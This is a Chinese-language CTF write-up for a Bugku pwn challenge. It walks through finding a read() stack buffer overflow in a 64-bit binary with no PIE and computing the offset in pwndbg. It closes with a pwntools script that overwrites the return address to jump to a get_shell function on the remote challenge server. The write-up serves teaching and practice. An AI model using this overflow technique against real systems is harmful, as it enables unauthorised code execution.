这道题来自于bugku旧平台的第二道pwn题,还是比较简单的,一个典型的缓冲区溢出题。
首先查看一下文件类型,file pwn2
,可以看到是64位的程序。然后用64位IDA打开,查看程序的逻辑。
可以看到这个程序的逻辑比较简单,有一个read
函数,这个函数一个危险函数,可能引发缓冲区溢出漏洞。常见的危险函数还有gets
、strcpy
、sprintf
、scanf
等。
然后查看字符串,看看是否有内置的后门。
如图所示,有个cat flag
的字符串,找到引用他的地方。
发现了一个get_shell
函数,我们只需要对buffer进行溢出,控制跳转,跳转到get_shell
函数的地址就能够获取flag了。
我们查看一下保护措施,看到并没有开启PIE,也就是地址随机化,所以可以直接用找到的地址。
首先用pwndbg
找到buffer
的地址,算出偏移。
在read
函数那下个断点,然后跟进去,由于这是个64位的程序,他的参数依次保存在rdi
、rsi
、rdx
、rcx
、r8
、r9
中。所以rdi
为0,rsi
为buffer的地址,rdx
为0x100。
我们用RBP-RSI+8
就能得到偏移地址,注意64位程序下的rbp占8个字节,所以后面要加上8。还有就是对地址进行打包的时候同样是64位格式的,用p64()
而不是p32()
。
如果对于栈溢出的原理不是很理解的,可以去看一下我之前pwnable.kr - bof 那篇文章,这里就不多赘述了。
源码如下:
from pwn import *
context.log_level = 'debug'
# conn = process('./pwn2')
conn = remote('114.116.54.89',10003)
shell_addr = 0x0000000000400751
conn.recvuntil('say something?')
buf_addr = 0x7fffffffe580
RBP = 0x7fffffffe5b0
payload = 'A' * (RBP-buf_addr+0x8) + p64(shell_addr)
conn.sendline(payload)
conn.interactive()